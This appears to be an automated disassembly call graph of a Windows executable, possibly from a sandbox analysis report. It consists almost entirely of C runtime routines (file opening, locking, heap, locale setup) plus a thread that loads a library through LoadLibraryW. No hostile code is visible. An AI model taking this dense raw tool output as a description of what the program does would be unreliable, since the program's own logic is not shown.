LeaveCriticalSection 17889->17892 17891 41c121 17891->17880 17892->17891 17896 41f862 __FrameHandler3::FrameUnwindToState 17893->17896 17894 41f869 17895 40e072 __dosmaperr 14 API calls 17894->17895 17897 41f86e 17895->17897 17896->17894 17898 41f894 17896->17898 17899 40df74 ___std_exception_copy 41 API calls 17897->17899 17904 41fe1e 17898->17904 17903 41f878 17899->17903 17903->17339 17917 41b2f4 17904->17917 17909 41fe54 17911 41f8b8 17909->17911 17912 4140f1 ___free_lconv_mon 14 API calls 17909->17912 17913 41f8eb 17911->17913 17912->17911 17914 41f8f1 17913->17914 17916 41f915 17913->17916 18436 41ca68 LeaveCriticalSection 17914->18436 17916->17903 17918 40fc60 __wsopen_s 41 API calls 17917->17918 17919 41b306 17918->17919 17920 41b318 17919->17920 17972 41448f 17919->17972 17922 410964 17920->17922 17978 4107f0 17922->17978 17925 41feaf 18028 41fbfa 17925->18028 17928 41fee1 17930 40e05f __dosmaperr 14 API calls 17928->17930 17929 41fefa 18046 41ca8b 17929->18046 17944 41fee6 17930->17944 17933 41ff08 17935 40e05f __dosmaperr 14 API calls 17933->17935 17934 41ff1f 18059 41fb65 CreateFileW 17934->18059 17938 41ff0d 17935->17938 17937 40e072 __dosmaperr 14 API calls 17941 41fef3 17937->17941 17939 40e072 __dosmaperr 14 API calls 17938->17939 17939->17944 17940 41ffd5 GetFileType 17942 41ffe0 GetLastError 17940->17942 17943 420027 17940->17943 17941->17909 17947 40e018 __dosmaperr 14 API calls 17942->17947 18061 41c9d6 17943->18061 17944->17937 17945 41ff58 17945->17940 17946 41ffaa GetLastError 17945->17946 18060 41fb65 CreateFileW 17945->18060 17948 40e018 __dosmaperr 14 API calls 17946->17948 17949 41ffee CloseHandle 17947->17949 17948->17944 17949->17944 17951 420017 17949->17951 17954 40e072 __dosmaperr 14 API calls 17951->17954 17953 41ff9d 17953->17940 17953->17946 17956 42001c 17954->17956 17956->17944 17957 420094 17961 42009b 17957->17961 18091 41f917 17957->18091 18085 414d2d 17961->18085 17962 4200d7 17962->17941 17964 420153 CloseHandle 17962->17964 18118 41fb65 CreateFileW 17964->18118 17966 42017e 17967 4201b4 17966->17967 17968 420188 GetLastError 17966->17968 17967->17941 17969 40e018 __dosmaperr 14 API calls 17968->17969 17970 420194 17969->17970 18119 41cb9e 17970->18119 17975 4141e3 17972->17975 17976 4143cc std::_Locinfo::_Locinfo_ctor 5 API calls 17975->17976 17977 4141f9 17976->17977 17977->17920 17979 410818 17978->17979 17980 4107fe 17978->17980 17982 41081f 17979->17982 17983 41083e 17979->17983 17996 4109a5 17980->17996 17987 410808 17982->17987 18000 4109e6 17982->18000 18005 41b00f 17983->18005 17986 41084d 17988 410854 GetLastError 17986->17988 17989 41087a 17986->17989 17991 4109e6 __wsopen_s 15 API calls 17986->17991 17987->17909 17987->17925 18008 40e018 17988->18008 17989->17987 17992 41b00f __wsopen_s MultiByteToWideChar 17989->17992 17991->17989 17994 410891 17992->17994 17994->17987 17994->17988 17995 40e072 __dosmaperr 14 API calls 17995->17987 17997 4109b0 17996->17997 17998 4109b8 17996->17998 17999 4140f1 ___free_lconv_mon 14 API calls 17997->17999 17998->17987 17999->17998 18001 4109a5 __wsopen_s 14 API calls 18000->18001 18002 4109f4 18001->18002 18013 410a25 18002->18013 18006 41b020 MultiByteToWideChar 18005->18006 18006->17986 18025 40e05f 18008->18025 18010 40e023 __dosmaperr 18011 40e072 __dosmaperr 14 API calls 18010->18011 18012 40e036 18011->18012 18012->17995 18016 415426 18013->18016 18017 415464 18016->18017 18018 415434 18016->18018 18019 40e072 __dosmaperr 14 API calls 18017->18019 18020 41544f HeapAlloc 18018->18020 18023 415438 __Getctype 18018->18023 18022 410a05 18019->18022 18021 415462 18020->18021 18020->18023 18021->18022 18022->17987 18023->18017 18023->18020 18024 412e98 std::_Facet_Register 2 API calls 18023->18024 18024->18023 18026 41528c __dosmaperr 14 API calls 18025->18026 18027 40e064 18026->18027 18027->18010 18029 41fc35 18028->18029 18030 41fc1b 18028->18030 18128 41fb8a 18029->18128 18030->18029 18032 40e072 __dosmaperr 14 API calls 18030->18032 18033 41fc2a 18032->18033 18034 40df74 ___std_exception_copy 41 API calls 18033->18034 18034->18029 18035 41fc6d 18036 41fc9c 18035->18036 18038 40e072 __dosmaperr 14 API calls 18035->18038 18043 41fcef 18036->18043 18135 4115c9 18036->18135 18040 41fc91 18038->18040 18039 41fcea 18041 41fd67 18039->18041 18039->18043 18042 40df74 ___std_exception_copy 41 API calls 18040->18042 18044 40dfa1 __Getctype 11 API calls 18041->18044 18042->18036 18043->17928 18043->17929 18045 41fd73 18044->18045 18047 41ca97 __FrameHandler3::FrameUnwindToState 18046->18047 18142 40e0c6 EnterCriticalSection 18047->18142 18050 41cac3 18146 41c865 18050->18146 18053 41ca9e 18053->18050 18055 41cb32 EnterCriticalSection 18053->18055 18057 41cae5 18053->18057 18055->18057 18058 41cb3f LeaveCriticalSection 18055->18058 18143 41cb95 18057->18143 18058->18053 18059->17945 18060->17953 18062 41c9e5 18061->18062 18063 41ca4e 18061->18063 18062->18063 18068 41ca0b __wsopen_s 18062->18068 18064 40e072 __dosmaperr 14 API calls 18063->18064 18065 41ca53 18064->18065 18066 40e05f __dosmaperr 14 API calls 18065->18066 18067 41ca3b 18066->18067 18067->17957 18070 41fd74 18067->18070 18068->18067 18069 41ca35 SetStdHandle 18068->18069 18069->18067 18071 41fd9c 18070->18071 18083 41fdce 18070->18083 18071->18083 18160 418ab3 18071->18160 18083->17957 18086 414d40 _Fputc 18085->18086 18401 414d5d 18086->18401 18088 414d4c 18092 41fa2b 18091->18092 18093 41f948 18091->18093 18092->17961 18092->17962 18094 4115c9 __wsopen_s 41 API calls 18093->18094 18101 41f968 18093->18101 18095 41f95f 18094->18095 18096 41fb5a 18095->18096 18095->18101 18097 40dfa1 __Getctype 11 API calls 18096->18097 18098 41fb64 18097->18098 18099 41fa51 18099->18092 18100 422232 __wsopen_s 53 API calls 18099->18100 18103 41fa5b 18099->18103 18108 41fa83 18100->18108 18101->18092 18101->18099 18102 418ab3 __wsopen_s 43 API calls 18101->18102 18105 41fa22 18101->18105 18104 41fa3b 18102->18104 18103->18092 18107 40e072 __dosmaperr 14 API calls 18103->18107 18104->18105 18112 41fa46 18104->18112 18105->18092 18105->18103 18414 416c70 18105->18414 18107->18092 18108->18092 18108->18103 18109 41faee 18108->18109 18110 41fac8 18108->18110 18111 41fabb 18108->18111 18114 418ab3 __wsopen_s 43 API calls 18109->18114 18110->18109 18113 41fad0 18110->18113 18115 40e072 __dosmaperr 14 API calls 18111->18115 18116 418ab3 __wsopen_s 43 API calls 18112->18116 18117 418ab3 __wsopen_s 43 API calls 18113->18117 18114->18103 18115->18103 18116->18099 18117->18103 18118->17966 18129 41fba2 18128->18129 18130 41fbbd 18129->18130 18131 40e072 __dosmaperr 14 API calls 18129->18131 18130->18035 18132 41fbe1 18131->18132 18133 40df74 ___std_exception_copy 41 API calls 18132->18133 18134 41fbec 18133->18134 18134->18035 18136 4115d5 18135->18136 18137 4115ea 18135->18137 18138 40e072 __dosmaperr 14 API calls 18136->18138 18137->18039 18139 4115da 18138->18139 18140 40df74 ___std_exception_copy 41 API calls 18139->18140 18141 4115e5 18140->18141 18141->18039 18142->18053 18154 40e10e LeaveCriticalSection 18143->18154 18145 41cb05 18145->17933 18145->17934 18147 414094 __Getctype 14 API calls 18146->18147 18149 41c877 18147->18149 18148 41c884 18150 4140f1 ___free_lconv_mon 14 API calls 18148->18150 18149->18148 18155 4146d9 18149->18155 18152 41c8d9 18150->18152 18152->18057 18153 41c9b3 EnterCriticalSection 18152->18153 18153->18057 18154->18145 18156 4143cc std::_Locinfo::_Locinfo_ctor 5 API calls 18155->18156 18157 4146f5 18156->18157 18158 414713 InitializeCriticalSectionAndSpinCount 18157->18158 18159 4146fe 18157->18159 18158->18159 18159->18149 18161 418ac7 _Fputc 18160->18161 18235 4189d2 18161->18235 18163 418adc 18241 41cc2f 18235->18241 18237 4189e4 18238 418a00 SetFilePointerEx 18237->18238 18240 4189ec __wsopen_s 18237->18240 18239 418a18 GetLastError 18238->18239 18238->18240 18239->18240 18240->18163 18242 41cc51 18241->18242 18243 41cc3c 18241->18243 18246 40e05f __dosmaperr 14 API calls 18242->18246 18248 41cc76 18242->18248 18244 40e05f __dosmaperr 14 API calls 18243->18244 18245 41cc41 18244->18245 18247 40e072 __dosmaperr 14 API calls 18245->18247 18249 41cc81 18246->18249 18250 41cc49 18247->18250 18248->18237 18251 40e072 __dosmaperr 14 API calls 18249->18251 18250->18237 18252 41cc89 18251->18252 18402 41cc2f __wsopen_s 41 API calls 18401->18402 18403 414d6d 18402->18403 18404 414d73 18403->18404 18405 414da5 18403->18405 18407 41cc2f __wsopen_s 41 API calls 18403->18407 18406 41cb9e __wsopen_s 15 API calls 18404->18406 18405->18404 18408 41cc2f __wsopen_s 41 API calls 18405->18408 18413 414dcb __wsopen_s 18406->18413 18409 414d9c 18407->18409 18410 414db1 CloseHandle 18408->18410 18411 41cc2f __wsopen_s 41 API calls 18409->18411 18410->18404 18412 414dbd GetLastError 18410->18412 18411->18405 18412->18404 18413->18088 18415 416c83 _Fputc 18414->18415 18420 416ca7 18415->18420 18418 40bbd5 _Fputc 41 API calls 18423 416cb3 __FrameHandler3::FrameUnwindToState 18420->18423 18421 416c95 18421->18418 18422 416d77 18424 40def7 _Fputc 41 API calls 18422->18424 18423->18421 18423->18422 18425 416d08 18423->18425 18424->18421 18431 41c9b3 EnterCriticalSection 18425->18431 18436->17916 22415 4067f8 22416 406829 22415->22416 22417 406801 22415->22417 22417->22416 22419 40edff 22417->22419 22420 40ee11 22419->22420 22424 40ee1a ___scrt_uninitialize_crt 22419->22424 22421 40ec83 ___scrt_uninitialize_crt 70 API calls 22420->22421 22422 40ee17 22421->22422 22422->22416 22423 40ee2b 22423->22416 22424->22423 22427 40ec23 22424->22427 22428 40ec2f __FrameHandler3::FrameUnwindToState 22427->22428 22435 40bb65 EnterCriticalSection 22428->22435 22430 40ec3d 22431 40ed91 ___scrt_uninitialize_crt 70 API calls 22430->22431 22432 40ec4e 22431->22432 22436 40ec77 22432->22436 22435->22430 22439 40bb79 LeaveCriticalSection 22436->22439 22438 40ec60 22438->22416 22439->22438 18437 407294 18438 4072a0 __FrameHandler3::FrameUnwindToState 18437->18438 18463 407505 18438->18463 18440 4072a7 18441 407400 18440->18441 18444 4072d1 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock __purecall 18440->18444 18500 407b01 IsProcessorFeaturePresent 18441->18500 18443 407407 18481 4115b3 18443->18481 18449 4072f0 18444->18449 18450 407371 18444->18450 18484 41158d 18444->18484 18447 411577 __purecall 23 API calls 18448 407415 18447->18448 18474 4111f1 18450->18474 18453 407377 18478 403ee0 CreateThread WaitForSingleObject 18453->18478 18458 40739c 18459 4073a5 18458->18459 18491 411568 18458->18491 18494 407676 18459->18494 18464 40750e 18463->18464 18504 4077e0 IsProcessorFeaturePresent 18464->18504 18468 40751f 18469 407523 18468->18469 18514 41335e 18468->18514 18469->18440 18472 40753a 18472->18440 18475 4111ff 18474->18475 18476 4111fa 18474->18476 18475->18453 18586 410f4b 18476->18586 18479 407420 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 18478->18479 18856 4038c0 18478->18856 18480 403f22 18479->18480 18489 407c21 GetModuleHandleW 18480->18489 18482 41139b __purecall 23 API calls 18481->18482 18483 40740d 18482->18483 18483->18447 18485 4115a3 std::_Locinfo::_Locinfo_ctor 18484->18485 18486 4107b4 __FrameHandler3::FrameUnwindToState 18484->18486 18485->18450 18486->18484 18487 41513b __Getctype 41 API calls 18486->18487 18488 40e13c __purecall 41 API calls 18486->18488 18487->18486 18488->18486 18490 407398 18489->18490 18490->18443 18490->18458 18492 41139b __purecall 23 API calls 18491->18492 18493 411573 18492->18493 18493->18459 18495 407682 18494->18495 18499 4073ae 18495->18499 19895 413370 18495->19895 18497 407690 18498 40a5ad ___scrt_uninitialize_crt 7 API calls 18497->18498 18498->18499 18499->18449 18501 407b17 __purecall codecvt 18500->18501 18502 407bc2 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18501->18502 18503 407c0d __purecall 18502->18503 18503->18443 18505 40751a 18504->18505 18506 40a58e 18505->18506 18523 40b667 18506->18523 18509 40a597 18509->18468 18511 40a59f 18512 40a5aa 18511->18512 18537 40b6a3 18511->18537 18512->18468 18577 41eff3 18514->18577 18517 40a5ad 18518 40a5c0 18517->18518 18519 40a5b6 18517->18519 18518->18469 18520 40a726 ___vcrt_uninitialize_ptd 6 API calls 18519->18520 18521 40a5bb 18520->18521 18522 40b6a3 ___vcrt_uninitialize_locks DeleteCriticalSection 18521->18522 18522->18518 18524 40b670 18523->18524 18526 40b699 18524->18526 18528 40a593 18524->18528 18541 40b8ac 18524->18541 18527 40b6a3 ___vcrt_uninitialize_locks DeleteCriticalSection 18526->18527 18527->18528 18528->18509 18529 40a6f3 18528->18529 18558 40b7bd 18529->18558 18534 40a723 18534->18511 18536 40a708 18536->18511 18538 40b6cd 18537->18538 18539 40b6ae 18537->18539 18538->18509 18540 40b6b8 DeleteCriticalSection 18539->18540 18540->18538 18540->18540 18546 40b6d2 18541->18546 18544 40b8e4 InitializeCriticalSectionAndSpinCount 18545 40b8cf 18544->18545 18545->18524 18547 40b6ef 18546->18547 18548 40b6f3 18546->18548 18547->18544 18547->18545 18548->18547 18549 40b75b GetProcAddress 18548->18549 18551 40b74c 18548->18551 18553 40b772 LoadLibraryExW 18548->18553 18549->18547 18551->18549 18552 40b754 FreeLibrary 18551->18552 18552->18549 18554 40b789 GetLastError 18553->18554 18555 40b7b9 18553->18555 18554->18555 18556 40b794 ___vcrt_InitializeCriticalSectionEx 18554->18556 18555->18548 18556->18555 18557 40b7aa LoadLibraryExW 18556->18557 18557->18548 18559 40b6d2 ___vcrt_InitializeCriticalSectionEx 5 API calls 18558->18559 18560 40b7d7 18559->18560 18561 40b7f0 TlsAlloc 18560->18561 18562 40a6fd 18560->18562 18562->18536 18563 40b86e 18562->18563 18564 40b6d2 ___vcrt_InitializeCriticalSectionEx 5 API calls 18563->18564 18565 40b888 18564->18565 18566 40b8a3 TlsSetValue 18565->18566 18567 40a716 18565->18567 18566->18567 18567->18534 18568 40a726 18567->18568 18569 40a730 18568->18569 18570 40a736 18568->18570 18572 40b7f8 18569->18572 18570->18536 18573 40b6d2 ___vcrt_InitializeCriticalSectionEx 5 API calls 18572->18573 18574 40b812 18573->18574 18575 40b82a TlsFree 18574->18575 18576 40b81e 18574->18576 18575->18576 18576->18570 18578 41f003 18577->18578 18579 40752c 18577->18579 18578->18579 18581 414a96 18578->18581 18579->18472 18579->18517 18582 414a9d 18581->18582 18583 414ae0 GetStdHandle 18582->18583 18584 414b42 18582->18584 18585 414af3 GetFileType 18582->18585 18583->18582 18584->18578 18585->18582 18587 410f54 18586->18587 18590 410f6a 18586->18590 18587->18590 18592 410f77 18587->18592 18589 410f61 18589->18590 18609 4110e2 18589->18609 18590->18475 18593 410f80 18592->18593 18594 410f83 18592->18594 18593->18589 18617 41c13b 18594->18617 18599 410fa0 18644 410fd1 18599->18644 18600 410f94 18601 4140f1 ___free_lconv_mon 14 API calls 18600->18601 18603 410f9a 18601->18603 18603->18589 18605 4140f1 ___free_lconv_mon 14 API calls 18606 410fc4 18605->18606 18607 4140f1 ___free_lconv_mon 14 API calls 18606->18607 18608 410fca 18607->18608 18608->18589 18610 411153 18609->18610 18615 4110f1 18609->18615 18610->18590 18611 41b08b WideCharToMultiByte _Fputc 18611->18615 18612 414094 __Getctype 14 API calls 18612->18615 18613 411157 18614 4140f1 ___free_lconv_mon 14 API calls 18613->18614 18614->18610 18615->18610 18615->18611 18615->18612 18615->18613 18616 4140f1 ___free_lconv_mon 14 API calls 18615->18616 18616->18615 18618 410f89 18617->18618 18619 41c144 18617->18619 18623 41c43d GetEnvironmentStringsW 18618->18623 18666 4151f6 18619->18666 18624 41c455 18623->18624 18625 410f8e 18623->18625 18626 41b08b _Fputc WideCharToMultiByte 18624->18626 18625->18599 18625->18600 18627 41c472 18626->18627 18628 41c487 18627->18628 18629 41c47c FreeEnvironmentStringsW 18627->18629 18630 415426 std::_Locinfo::_Locinfo_ctor 15 API calls 18628->18630 18629->18625 18631 41c48e 18630->18631 18632 41c4a7 18631->18632 18633 41c496 18631->18633 18635 41b08b _Fputc WideCharToMultiByte 18632->18635 18634 4140f1 ___free_lconv_mon 14 API calls 18633->18634 18636 41c49b FreeEnvironmentStringsW 18634->18636 18637 41c4b7 18635->18637 18636->18625 18638 41c4c6 18637->18638 18639 41c4be 18637->18639 18640 4140f1 ___free_lconv_mon 14 API calls 18638->18640 18641 4140f1 ___free_lconv_mon 14 API calls 18639->18641 18642 41c4c4 FreeEnvironmentStringsW 18640->18642 18641->18642 18642->18625 18645 410fe6 18644->18645 18646 414094 __Getctype 14 API calls 18645->18646 18647 41100d 18646->18647 18648 411015 18647->18648 18657 41101f 18647->18657 18649 4140f1 ___free_lconv_mon 14 API calls 18648->18649 18665 410fa7 18649->18665 18650 41107c 18651 4140f1 ___free_lconv_mon 14 API calls 18650->18651 18651->18665 18652 414094 __Getctype 14 API calls 18652->18657 18653 41108b 18850 4110b3 18653->18850 18657->18650 18657->18652 18657->18653 18659 4110a6 18657->18659 18661 4140f1 ___free_lconv_mon 14 API calls 18657->18661 18841 4133ff 18657->18841 18658 4140f1 ___free_lconv_mon 14 API calls 18660 411098 18658->18660 18662 40dfa1 __Getctype 11 API calls 18659->18662 18664 4140f1 ___free_lconv_mon 14 API calls 18660->18664 18661->18657 18663 4110b2 18662->18663 18664->18665 18665->18605 18667 415201 18666->18667 18671 415207 18666->18671 18668 4145dd __Getctype 6 API calls 18667->18668 18668->18671 18669 41461c __Getctype 6 API calls 18670 415221 18669->18670 18672 41520d 18670->18672 18675 414094 __Getctype 14 API calls 18670->18675 18671->18669 18671->18672 18673 40e13c __purecall 41 API calls 18672->18673 18674 415212 18672->18674 18676 41528b 18673->18676 18691 41bf46 18674->18691 18677 415231 18675->18677 18678 415239 18677->18678 18679 41524e 18677->18679 18681 41461c __Getctype 6 API calls 18678->18681 18680 41461c __Getctype 6 API calls 18679->18680 18682 41525a 18680->18682 18683 415245 18681->18683 18684 41526d 18682->18684 18685 41525e 18682->18685 18686 4140f1 ___free_lconv_mon 14 API calls 18683->18686 18688 414f69 __Getctype 14 API calls 18684->18688 18687 41461c __Getctype 6 API calls 18685->18687 18686->18672 18687->18683 18689 415278 18688->18689 18690 4140f1 ___free_lconv_mon 14 API calls 18689->18690 18690->18674 18692 41c09b __wsopen_s 41 API calls 18691->18692 18693 41bf70 18692->18693 18714 41bcc6 18693->18714 18696 41bf89 18696->18618 18697 415426 std::_Locinfo::_Locinfo_ctor 15 API calls 18698 41bf9a 18697->18698 18699 41bfb0 18698->18699 18700 41bfa2 18698->18700 18721 41c196 18699->18721 18701 4140f1 ___free_lconv_mon 14 API calls 18700->18701 18701->18696 18704 41bfe8 18705 40e072 __dosmaperr 14 API calls 18704->18705 18708 41bfed 18705->18708 18706 41c02f 18709 41c078 18706->18709 18732 41bbb8 18706->18732 18707 41c003 18707->18706 18711 4140f1 ___free_lconv_mon 14 API calls 18707->18711 18710 4140f1 ___free_lconv_mon 14 API calls 18708->18710 18713 4140f1 ___free_lconv_mon 14 API calls 18709->18713 18710->18696 18711->18706 18713->18696 18715 40fc60 __wsopen_s 41 API calls 18714->18715 18716 41bcd8 18715->18716 18717 41bce7 GetOEMCP 18716->18717 18718 41bcf9 18716->18718 18719 41bd10 18717->18719 18718->18719 18720 41bcfe GetACP 18718->18720 18719->18696 18719->18697 18720->18719 18722 41bcc6 43 API calls 18721->18722 18723 41c1b6 18722->18723 18725 41c1f3 IsValidCodePage 18723->18725 18729 41c22f codecvt 18723->18729 18724 407420 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 18726 41bfdd 18724->18726 18727 41c205 18725->18727 18725->18729 18726->18704 18726->18707 18728 41c234 GetCPInfo 18727->18728 18731 41c20e codecvt 18727->18731 18728->18729 18728->18731 18729->18724 18740 41bd9a 18731->18740 18733 41bbc4 __FrameHandler3::FrameUnwindToState 18732->18733 18815 40e0c6 EnterCriticalSection 18733->18815 18735 41bbce 18816 41bc05 18735->18816 18741 41bdc2 GetCPInfo 18740->18741 18750 41be8b 18740->18750 18742 41bdda 18741->18742 18741->18750 18751 418da8 18742->18751 18743 407420 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 18745 41bf44 18743->18745 18745->18729 18750->18743 18752 40fc60 __wsopen_s 41 API calls 18751->18752 18753 418dc8 18752->18753 18754 41b00f __wsopen_s MultiByteToWideChar 18753->18754 18757 418df5 18754->18757 18755 418e8c 18758 407420 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 18755->18758 18756 418e84 18771 40716c 18756->18771 18757->18755 18757->18756 18760 415426 std::_Locinfo::_Locinfo_ctor 15 API calls 18757->18760 18762 418e1a __alloca_probe_16 codecvt 18757->18762 18761 418eaf 18758->18761 18760->18762 18766 41909f 18761->18766 18762->18756 18763 41b00f __wsopen_s MultiByteToWideChar 18762->18763 18764 418e65 18763->18764 18764->18756 18765 418e70 GetStringTypeW 18764->18765 18765->18756 18767 40fc60 __wsopen_s 41 API calls 18766->18767 18772 407176 18771->18772 18774 407187 18771->18774 18772->18774 18775 40dd34 18772->18775 18774->18755 18776 4140f1 ___free_lconv_mon 14 API calls 18775->18776 18815->18735 18826 410178 18816->18826 18818 41bc27 18819 410178 41 API calls 18818->18819 18820 41bc46 18819->18820 18821 41bbdb 18820->18821 18822 4140f1 ___free_lconv_mon 14 API calls 18820->18822 18822->18821 18827 410189 18826->18827 18830 410185 _Yarn 18826->18830 18828 410190 18827->18828 18833 4101a3 codecvt 18827->18833 18829 40e072 __dosmaperr 14 API calls 18828->18829 18831 410195 18829->18831 18830->18818 18832 40df74 ___std_exception_copy 41 API calls 18831->18832 18832->18830 18833->18830 18834 4101d1 18833->18834 18835 4101da 18833->18835 18836 40e072 __dosmaperr 14 API calls 18834->18836 18835->18830 18837 40e072 __dosmaperr 14 API calls 18835->18837 18838 4101d6 18836->18838 18837->18838 18842 41340d 18841->18842 18843 41341b 18841->18843 18842->18843 18848 413433 18842->18848 18844 40e072 __dosmaperr 14 API calls 18843->18844 18845 413423 18844->18845 18846 40df74 ___std_exception_copy 41 API calls 18845->18846 18847 41342d 18846->18847 18847->18657 18848->18847 18849 40e072 __dosmaperr 14 API calls 18848->18849 18849->18845 18851 4110c0 18850->18851 18852 411091 18850->18852 18853 4110d7 18851->18853 18854 4140f1 ___free_lconv_mon 14 API calls 18851->18854 18852->18658 18855 4140f1 ___free_lconv_mon 14 API calls 18853->18855 18854->18851 18855->18852 18895 40742e 18856->18895 18858 4038e3 std::ios_base::_Ios_base_dtor 18859 403902 LoadLibraryW 18858->18859 18905 402320 18859->18905 18897 407433 18895->18897 18898 40744d 18897->18898 18899 412e98 std::_Facet_Register 2 API calls 18897->18899 18900 40744f std::_Facet_Register 18897->18900 18991 40e180 18897->18991 18898->18858 18899->18897 18901 407f8e std::_Facet_Register 18900->18901 19000 408090 18900->19000 18902 408090 CallUnexpected RaiseException 18901->18902 18903 407fab 18902->18903 18908 402368 std::ios_base::_Ios_base_dtor 18905->18908 18912 4036c0 std::ios_base::_Ios_base_dtor 18905->18912 18906 407420 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 18907 403723 18906->18907 18916 401fd0 18907->18916 18908->18908 18909 404390 std::ios_base::_Init 43 API calls 18908->18909 18911 4036c2 18908->18911 18908->18912 18913 403727 18908->18913 19003 401110 18908->19003 18909->18908 18911->18912 18911->18913 18912->18906 19007 40df84 18913->19007 19232 403fc0 18916->19232 18992 415426 18991->18992 18993 415464 18992->18993 18995 41544f HeapAlloc 18992->18995 18998 415438 __Getctype 18992->18998 18994 40e072 __dosmaperr 14 API calls 18993->18994 18997 415469 18994->18997 18996 415462 18995->18996 18995->18998 18996->18997 18997->18897 18998->18993 18998->18995 18999 412e98 std::_Facet_Register 2 API calls 18998->18999 18999->18998 19001 4080d7 RaiseException 19000->19001 19002 4080aa 19000->19002 19001->18901 19002->19001 19004 401122 19003->19004 19012 40d98e 19004->19012 19008 40dec0 ___std_exception_copy 41 API calls 19007->19008 19009 40df93 19008->19009 19010 40dfa1 __Getctype 11 API calls 19009->19010 19011 40dfa0 19010->19011 19013 40d9a2 _Fputc 19012->19013 19014 40d9c4 19013->19014 19015 40d9eb 19013->19015 19016 40def7 _Fputc 41 API calls 19014->19016 19021 40bdc9 19015->19021 19017 40d9df 19016->19017 19019 40bbd5 _Fputc 41 API calls 19017->19019 19020 40113c 19019->19020 19020->18908 19022 40bdd5 __FrameHandler3::FrameUnwindToState 19021->19022 19029 40bb65 EnterCriticalSection 19022->19029 19024 40bde3 19030 40c97a 19024->19030 19029->19024 19044 4163d8 19030->19044 19032 40c9a1 19051 40cb85 19032->19051 19039 407420 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 19040 40bdf0 19039->19040 19073 41639d 19044->19073 19046 4163e9 19047 41644c 19046->19047 19048 415426 std::_Locinfo::_Locinfo_ctor 15 API calls 19046->19048 19047->19032 19049 416443 19048->19049 19050 4140f1 ___free_lconv_mon 14 API calls 19049->19050 19050->19047 19086 40d7a6 19051->19086 19054 40cbae 19055 40def7 _Fputc 41 API calls 19054->19055 19056 40c9e8 19055->19056 19066 40c93c 19056->19066 19059 40d730 _Fputc 41 API calls 19061 40cbd9 std::_Locinfo::_Locinfo_ctor 19059->19061 19061->19056 19061->19059 19062 40cdb6 19061->19062 19092 40cf8f 19061->19092 19121 40cb0d 19061->19121 19124 40ce31 19061->19124 19063 40def7 _Fputc 41 API calls 19062->19063 19064 40cdd2 19063->19064 19065 40def7 _Fputc 41 API calls 19064->19065 19065->19056 19067 4140f1 ___free_lconv_mon 14 API calls 19066->19067 19068 40c94c 19067->19068 19069 416484 19068->19069 19070 40ca02 19069->19070 19071 41648f 19069->19071 19070->19039 19071->19070 19225 40ed28 19071->19225 19075 4163a9 19073->19075 19074 4163ca 19074->19046 19075->19074 19079 414bd2 19075->19079 19077 4163c4 19078 421bd0 __wsopen_s 41 API calls 19077->19078 19078->19074 19080 414bf3 19079->19080 19081 414bde 19079->19081 19080->19077 19082 40e072 __dosmaperr 14 API calls 19081->19082 19083 414be3 19082->19083 19084 40df74 ___std_exception_copy 41 API calls 19083->19084 19085 414bee 19084->19085 19085->19077 19087 40d7b1 19086->19087 19088 40d7d3 19086->19088 19090 40def7 _Fputc 41 API calls 19087->19090 19158 40d7de 19088->19158 19091 40cba0 19090->19091 19091->19054 19091->19056 19091->19061 19093 40cfb3 19092->19093 19094 40d024 19092->19094 19097 40d051 19093->19097 19098 40cfb9 19093->19098 19095 40d077 19094->19095 19096 40d029 19094->19096 19095->19097 19107 40cff6 19095->19107 19120 40cfdb 19095->19120 19099 40d06b 19096->19099 19100 40d02b 19096->19100 19185 40c2c9 19097->19185 19101 40cfbf 19098->19101 19098->19107 19202 40d645 19099->19202 19103 40d030 19100->19103 19112 40cfcd 19100->19112 19108 40d00b 19101->19108 19101->19112 19101->19120 19103->19097 19106 40d035 19103->19106 19109 40d048 19106->19109 19110 40d03a 19106->19110 19119 40cfef 19107->19119 19166 40c446 19107->19166 19108->19119 19173 40d50f 19108->19173 19110->19119 19112->19119 19112->19120 19192 40d385 19112->19192 19113 407420 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 19116 40d2d5 19113->19116 19116->19061 19119->19113 19120->19119 19205 41607a 19120->19205 19215 40bf1f 19121->19215 19123 40cb48 19123->19061 19125 40ce38 19124->19125 19126 40ce4f 19124->19126 19128 40cfb3 19125->19128 19129 40d024 19125->19129 19130 40ce8e 19125->19130 19127 40def7 _Fputc 41 API calls 19126->19127 19126->19130 19133 40ce83 19127->19133 19134 40d051 19128->19134 19135 40cfb9 19128->19135 19131 40d077 19129->19131 19132 40d029 19129->19132 19130->19061 19131->19134 19142 40cff6 19131->19142 19157 40cfdb 19131->19157 19136 40d06b 19132->19136 19137 40d02b 19132->19137 19133->19061 19140 40c2c9 42 API calls 19134->19140 19135->19142 19144 40cfbf 19135->19144 19141 40d645 42 API calls 19136->19141 19138 40d030 19137->19138 19139 40cfcd 19137->19139 19138->19134 19143 40d035 19138->19143 19145 40d385 44 API calls 19139->19145 19156 40cfef 19139->19156 19139->19157 19140->19157 19141->19157 19149 40c446 42 API calls 19142->19149 19142->19156 19144->19139 19146 40d00b 19144->19146 19144->19157 19145->19157 19152 40d50f 43 API calls 19146->19152 19146->19156 19149->19157 19150 407420 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 19152->19157 19155 41607a _Fputc 43 API calls 19155->19157 19156->19150 19157->19155 19157->19156 19159 40d85c 19158->19159 19160 40d7f2 19158->19160 19159->19091 19161 414bd2 _Ungetc 41 API calls 19160->19161 19162 40d7f9 19161->19162 19162->19159 19163 40e072 __dosmaperr 14 